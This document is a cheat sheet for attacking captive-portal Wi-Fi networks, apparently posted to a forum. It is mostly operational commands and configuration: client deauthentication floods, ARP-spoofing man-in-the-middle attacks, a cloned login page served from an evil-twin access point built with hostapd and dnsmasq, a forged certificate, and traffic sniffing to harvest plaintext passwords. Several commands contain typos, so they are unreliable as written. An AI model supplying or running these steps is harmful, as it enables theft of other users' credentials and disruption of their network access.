Hello all, This is a simple cheat sheet for Hacking/Pentesting Captive Portals Enabled Wireless/Wifi networks
Before Starting the attack, it is recommended to Change your Device MAC Address
Sniffing Capitive Portal Login Information using monitor mode
#Enabling Monitor Mode
#Check the interface name and update it accordingly
ifconfig
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
#Start Sniffing and De-auth the user - so, that we can sniff the traffic
airodump-ng wlan0
airodump-ng --bssid routermac --channel 12 --write filename wlan0
aireplay-ng --deauth 1000 -a routermac -c clientmac mon0
#open the captured file in wireshark and view the contents - if the captive portal is in HTTP - you can get plain text password
filters: "http", "post", frame contains user
Sniffing Capitive Portal Login Information using ARP Spoofing
#fid your gateway address
ip r
#start the attack using MITMf
mitmf --arp --spoof i wlan0 --gateway 192.168.2.1
#Start Attack using Ettercap
ettercap -Tq -M arp:remote -i wlan0
Sniffing Capitive Portal Login Information using Social Engineering
follow the below process, or you can go though Evil Twin Attack via Linset
#Create a fake Captive Portal Page
--> open capitive portal, then right click --> save page as --> save the html page
--> go to "var/www/html" and paste the saved html pages and files
--> change the mainpage to index.html
--> start web server #service apache2 start
--> apt-get instal geany (optional)
--> open the index.html page in text editor and fix relative url's
--> add a "/" before the link <link href="/sd/sd/s/style.css"
--> make sure input boxes are in "form" tag. if not add manually <form> </form>
--> <form method="post" action="/index.html"> inputs and login </form>
--> add a submit button or text to receive <input type="submit" value="Log in">
--> add a button with the same style
#Creating a Fake AP with Same name
Requirements:
1. A router broadcasting signal -- > wifi card with hostpad
2. A DHCP server to give IP's to clients --> use dnsmasq
3. A DNS Server to handle dns requests --> use dnsmasq
apt-get install hostapd dnsmasq
ifconfig
service network-manager stop
--> network is disabled
--> OPTIONAL (CLEARING IPTABLES)
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
--> need a dnsmasq.conf file
#set the wifi interface
interface=wlan0
#set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100.8h
#get the gatway IP address
dhcp-option=3,10.0.0.1
#Set dns server address
dhcp-option=6,10.0.0.1
#Redirect all requests to 10.0.0.1
address=/#/10.0.0.1
--> save it as dnsmasq.conf
--> we need hostpd.conf file as well
#set wifi interface
interface=wlan0
#set network name
ssid=Network Name 2
#set channel
channel=1
#ser driver
driver=nl80211
--> save it as hostpd.conf
dnsmasq -C /root/downloads/dsqmasq.conf
--> -B to run it in the background
hostapd -C /root/downloads/hostapd.conf -B
ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
service apache2 start
leafpad /etc/apache2/sites-enables/000-default.conf
--> need to add a rule, so that anypage accessed should be redirect to our addres
--> type in the 000-default.conf file. This is done to redirect any request for a www website to the
same website without www
--> after <VirtualHost *:80> type the following
ErrorDoccument 404 /
--> after </VirtualHost> type
<VirtualHost *:443>
SSLEngine On
SSLCertificateFile /root/Downloads/cert.pem
SSLCertificateKeyFile /root/Downloads/cert.key
<VirtualHost>
<Directory "/var/www/html">
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
--> this is for Iphones/smartphones to redirect 404 page to webroot
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ / [L,QSA]
</Directory>
--> save this file
service apache2 restart
#Create a SSL Cert for HTTPS catpive Portals
openssl req -new -X509 -day 365 -out ert.pem -keyout cert.key
--> enter a password and hit enter
--> it asks for country name: set it to according to your country "EU"
--> State: name
--> City: Name
--> company: Microsoft
--> Unit Name: Networking
--> Common Name: Wifi Name
--> Email: Email
--> Certifate should have been created ...
--> to enable SSL on apache
a2enmod ssl
leafpad /etc/apache2/ports.conf
#add a line of code in ports.config and save the file
Listen 443
#restart the service
service apache2 restart
#De-authenticate the users from the original network
airodump-ng --bssid routermac --channel number mon0
aireplay-ng --deauth 100000 -a routermac mon0
#Start Sniffing the traffic
#update the interface accordingly
tshark -i wlan0 -w filename.cap
#Once you think the user is logged in, Open the file in wireshark and go through the traffic
#if the traffic is encrypted, as you have the cert - you can decrypt the view the data